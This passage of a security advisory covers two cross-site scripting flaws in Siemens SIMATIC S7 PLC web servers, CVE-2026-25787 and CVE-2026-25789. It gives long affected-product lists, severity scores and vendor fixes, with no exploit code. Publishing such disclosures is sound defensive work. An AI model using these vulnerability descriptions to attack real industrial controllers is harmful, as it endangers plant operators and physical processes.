PN (6ES7517-3UQ10-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0), SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0), SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0), SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0), SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0), SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0), SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0), SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0), SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0), SIMATIC S7-1500 Software Controller CPU 1507S F V2, SIMATIC S7-1500 Software Controller CPU 1507S F V3, SIMATIC S7-1500 Software Controller CPU 1507S F V4, SIMATIC S7-1500 Software Controller CPU 1507S V2, SIMATIC S7-1500 Software Controller CPU 1507S V3, SIMATIC S7-1500 Software Controller CPU 1507S V4, SIMATIC S7-1500 Software Controller CPU 1508S F V2, SIMATIC S7-1500 Software Controller CPU 1508S F V3, SIMATIC S7-1500 Software Controller CPU 1508S F V4, SIMATIC S7-1500 Software Controller CPU 1508S T V3, SIMATIC S7-1500 Software Controller CPU 1508S TF V3, SIMATIC S7-1500 Software Controller CPU 1508S V2, SIMATIC S7-1500 Software Controller CPU 1508S V3, SIMATIC S7-1500 Software Controller CPU 1508S V4, SIMATIC S7-1500 Software Controller Linux V2, SIMATIC S7-1500 Software Controller Linux V3, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0), SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-4AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0), SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN00-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0), SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0) Product Status: known_affected Remediations Mitigation Restrict TIA project download to trusted personnel only. No fix planned Currently no fix is planned None available Currently no fix is available Vendor fix Update to V2.9.9 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/ Vendor fix Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109773914/ Vendor fix Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H CVE-2026-25787 Affected devices do not properly validate and sanitize Technology Object (TO) name rendered on the "Motion Control Diagnostics" page of the web interface. This could allow an authenticated attacker who is authorized to download a TIA project into the product, to inject malicious scripts into the page. If a benign user with appropriate rights accesses the "Motion Control Diagnostics" parameters page, the malicious code would be executed in the scope of their web session. View CVE Details Affected Products Siemens SIMATIC S7 PLC Web Server Vendor: Siemens Product Version: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0), SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0), SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0), SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0), SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0), SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0), SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0), SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0), SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0), SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0), SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0), SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0), SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0), SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0), SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0), SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0), SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0), SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0), SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0), SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0), SIMATIC S7-1500 Software Controller CPU 1507S F V2, SIMATIC S7-1500 Software Controller CPU 1507S F V3, SIMATIC S7-1500 Software Controller CPU 1507S F V4, SIMATIC S7-1500 Software Controller CPU 1507S V2, SIMATIC S7-1500 Software Controller CPU 1507S V3, SIMATIC S7-1500 Software Controller CPU 1507S V4, SIMATIC S7-1500 Software Controller CPU 1508S F V2, SIMATIC S7-1500 Software Controller CPU 1508S F V3, SIMATIC S7-1500 Software Controller CPU 1508S F V4, SIMATIC S7-1500 Software Controller CPU 1508S T V3, SIMATIC S7-1500 Software Controller CPU 1508S TF V3, SIMATIC S7-1500 Software Controller CPU 1508S V2, SIMATIC S7-1500 Software Controller CPU 1508S V3, SIMATIC S7-1500 Software Controller CPU 1508S V4, SIMATIC S7-1500 Software Controller Linux V2, SIMATIC S7-1500 Software Controller Linux V3, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0), SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-4AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0), SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN00-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0), SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0) Product Status: known_affected Remediations Mitigation Restrict TIA project download to trusted personnel only. No fix planned Currently no fix is planned None available Currently no fix is available Vendor fix Update to V2.9.9 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/ Vendor fix Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109773914/ Vendor fix Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H CVE-2026-25789 Affected devices do not properly validate and sanitize filenames on the Firmware Update page. This could allow a remote attacker to social engineer the user into selecting the modified firmware file to be uploaded. This would result in malitcious JavaScript execution in the context of the authenticated user's session without requiring the file to be uploaded, potentially leading to session hijacking or credential theft. View CVE Details Affected Products Siemens SIMATIC S7 PLC Web Server Vendor: Siemens Product Version: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0), SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0), SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0), SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0), SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0), SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0), SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0), SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0), SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0), SIMATIC S7-1500 CPU 1516pro-2 PN 